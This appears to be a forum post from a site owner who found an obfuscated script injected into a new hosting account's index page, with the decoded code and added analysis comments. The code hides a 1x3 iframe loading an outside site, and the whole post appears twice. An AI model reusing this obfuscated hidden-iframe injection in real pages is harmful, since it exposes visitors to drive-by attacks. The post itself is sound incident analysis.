scot
06-03-2009, 07:31 AM
After opening my new DASP account last week I replaced the default index.htm page with a very simple html page that only had my domain name centered on the page.
Several days later I noticed a javascript error whenever I loaded the page. When I looked at the source for my new index.htm page there was a mysterious javascript function in the body.
The script was encoded as ascii character codes as follows:
<!-- Analysis note: this is the injected block as pasted in the post.
     eval(String.fromCharCode(...)) turns the list of character codes into
     source text and runs it, so the page source shows only numbers.
     The missing space in "<scripttype" and the spaces inside some numbers
     (for example "4 9" on the first data line) appear to be forum or
     extraction artifacts; with them in place the text below is not valid script. -->
<scripttype="text/javascript">eval(String.fromCharCode
(118,97,114,32,106,104,113,119,61,49,50,51,49,49,4 9,51,43,50,53,59,118,97,114,32,103,
104,103,52,53,61,34,107,97,114,34,59,118,97,114,32 ,119,61,34,108,97,115,116,34,59,118,
97,114,32,114,101,54,61,34,46,34,59,118,97,114,32, 104,50,104,61,34,99,111,109,34,59,118,
97,114,32,97,61,34,105,102,114,34,59,118,97,114,32 ,115,61,34,104,116,116,34,59,100,111,
99,117,109,101,110,116,46,119,114,105,116,101,40,3 9,60,39,43,97,43,39,97,109,101,32,115,
114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47 ,39,43,103,104,103,52,53,43,39,39,43,119,
43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,3 9,47,39,43,39,34,32,119,105,100,39,43,39,
116,104,61,34,49,34,32,104,39,43,39,101,105,103,10 4,116,61,34,51,34,62,60,47,105,102,39,43,
39,114,39,43,39,97,109,101,62,39,41,59,32,102,117, 110,99,116,105,111,110,32,103,103,54,51,
52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,6 1,57,43,55,53,52,52,59,125,32,118,97,114,
32,109,110,98,113,61,52,51,48,52,49,56,50,52))
</script>
I decoded the ascii stream and it looks like this:
// Decoded payload as posted; the code is unchanged and the comments are analysis notes.
// jhqw is assigned but never read in the visible code, so it looks like filler.
// The other variables hold fragments of a tag name ("ifr") and of a URL ("htt", "kar",
// "last", ".", "com"); splitting them presumably keeps the words "iframe" and the
// domain from appearing as plain strings in the page source (inferred, not shown).
var jhqw=1231113+25;var ghg45="kar";var w="last";var re6=".";var h2h="com";var a="ifr";var s="htt";
// The concatenation below produces an iframe element whose src is
// hxxp://karlast[.]com/ (defanged here) with width 1 and height 3, and
// document.write inserts it into the page as it loads. The browser is not
// redirected; the remote page is fetched inside a frame too small to notice.
document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'r'+'ame>');
// gg6345 is never called and mnbq is never read in the visible code; both look like filler.
function gg6345(){var as3113=9+7544;} var mnbq=43041824
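Basically it is trying to pull in a site called "karlast.com": rather than redirecting the browser, it writes a tiny iframe (width 1, height 3) into the page that loads that site where the visitor won't notice it. I tried to navigate to the page but it doesn't exist anymore. Most likely a rogue site that has been taken down.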
How could this script have gotten into my default page? I have scanned my system for virus/malware and it is clean. No one else has access to my account (at least no one is supposed to have access!).
Thanks, Scott.
Several days later I noticed a javascript error whenever I loaded the page. When I looked at the source for my new index.htm page there was a mysterious javascript function in the body.
The script was encoded as ascii character codes as follows:
<!-- Analysis note: this is the injected block as pasted in the post.
     eval(String.fromCharCode(...)) turns the list of character codes into
     source text and runs it, so the page source shows only numbers.
     The missing space in "<scripttype" and the spaces inside some numbers
     (for example "4 9" on the first data line) appear to be forum or
     extraction artifacts; with them in place the text below is not valid script. -->
<scripttype="text/javascript">eval(String.fromCharCode
(118,97,114,32,106,104,113,119,61,49,50,51,49,49,4 9,51,43,50,53,59,118,97,114,32,103,
104,103,52,53,61,34,107,97,114,34,59,118,97,114,32 ,119,61,34,108,97,115,116,34,59,118,
97,114,32,114,101,54,61,34,46,34,59,118,97,114,32, 104,50,104,61,34,99,111,109,34,59,118,
97,114,32,97,61,34,105,102,114,34,59,118,97,114,32 ,115,61,34,104,116,116,34,59,100,111,
99,117,109,101,110,116,46,119,114,105,116,101,40,3 9,60,39,43,97,43,39,97,109,101,32,115,
114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47 ,39,43,103,104,103,52,53,43,39,39,43,119,
43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,3 9,47,39,43,39,34,32,119,105,100,39,43,39,
116,104,61,34,49,34,32,104,39,43,39,101,105,103,10 4,116,61,34,51,34,62,60,47,105,102,39,43,
39,114,39,43,39,97,109,101,62,39,41,59,32,102,117, 110,99,116,105,111,110,32,103,103,54,51,
52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,6 1,57,43,55,53,52,52,59,125,32,118,97,114,
32,109,110,98,113,61,52,51,48,52,49,56,50,52))
</script>
I decoded the ascii stream and it looks like this:
// Decoded payload as posted; the code is unchanged and the comments are analysis notes.
// jhqw is assigned but never read in the visible code, so it looks like filler.
// The other variables hold fragments of a tag name ("ifr") and of a URL ("htt", "kar",
// "last", ".", "com"); splitting them presumably keeps the words "iframe" and the
// domain from appearing as plain strings in the page source (inferred, not shown).
var jhqw=1231113+25;var ghg45="kar";var w="last";var re6=".";var h2h="com";var a="ifr";var s="htt";
// The concatenation below produces an iframe element whose src is
// hxxp://karlast[.]com/ (defanged here) with width 1 and height 3, and
// document.write inserts it into the page as it loads. The browser is not
// redirected; the remote page is fetched inside a frame too small to notice.
document.write('<'+a+'ame sr'+'c="'+s+'p://'+ghg45+''+w+''+re6+''+h2h+'/'+'" wid'+'th="1" h'+'eight="3"></if'+'r'+'ame>');
// gg6345 is never called and mnbq is never read in the visible code; both look like filler.
function gg6345(){var as3113=9+7544;} var mnbq=43041824
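Basically it is trying to pull in a site called "karlast.com": rather than redirecting the browser, it writes a tiny iframe (width 1, height 3) into the page that loads that site where the visitor won't notice it. I tried to navigate to the page but it doesn't exist anymore. Most likely a rogue site that has been taken down.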
How could this script have gotten into my default page? I have scanned my system for virus/malware and it is clean. No one else has access to my account (at least no one is supposed to have access!).
Thanks, Scott.